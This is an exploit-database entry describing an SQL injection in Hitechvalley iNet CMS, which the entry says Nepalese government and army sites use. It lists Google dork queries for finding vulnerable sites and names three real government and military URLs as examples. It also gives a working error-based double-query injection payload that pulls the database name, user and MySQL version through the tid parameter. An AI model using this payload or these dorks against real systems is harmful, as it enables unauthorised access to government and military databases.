Hitechvalley iNet CMS advanced SQL Injection vulnerability

2013-03-01T00:00:00
ID 1337DAY-ID-20455
Type zdt
Reporter Zyklon B
Modified 2013-03-01T00:00:00

Description

Hitechvalley iNet is a CMS for nepalian webistes, which is used mainly by organizations, the govnerment and the Nepal Army.

                                        
                                            # Exploit Title: Hitechvalley iNet CMS SQL Injection vulnerability
# Date: 24/02/2013
# Author: Zyklon B - https://twitter.com/BZyklon#
# Vendor or Software Link: http://www.hitechvalley.net/
# Version: N/A
# Google Keywords: "Powered by Hitechvalley i Net" inurl:tender_details  |  "Powered by Hitechvalley i Net" inurl:eproc  |  inurl:eproc inurl:tender_details  |  inurl:eproc site:np  |  "E-Submission of Bids" site:np
# Tested on: Windows 7 x86 - Firefox & Chrome

# Three websites examples: 

http://eproc.presidentofnepal.gov.np/tender_details.php?tid=345
http://eproc.nepalarmy.mil.np/tender_details.php?tid=16
http://www.edudbc.gov.np/tender_details.php?tid=95


###############################################################################


Note: SQLi warning if you try a simple integer based injection (even with WAF, etc.).




This CMS is vulnerable to double query injection OR based.

Affected parameter: tender_details




Injection line to get the MySQL version, the the DB name and the user address:
http://localhost/tender_details.php?tid=X OR 1 GROUP BY CONCAT(database(),0x3a,user(),0x3a,version(),(SELECT (CASE WHEN (A=A) THEN 1 ELSE 0 END)),FLOOR(RAND(0)*2)) HAVING MIN(0)#



If the value X if the parameter tid is 804, it is advisable to take the same value for A (but after some tests, it seems that A can take any value while its an integer).




************************************************

#  0day.today [2018-04-05]  #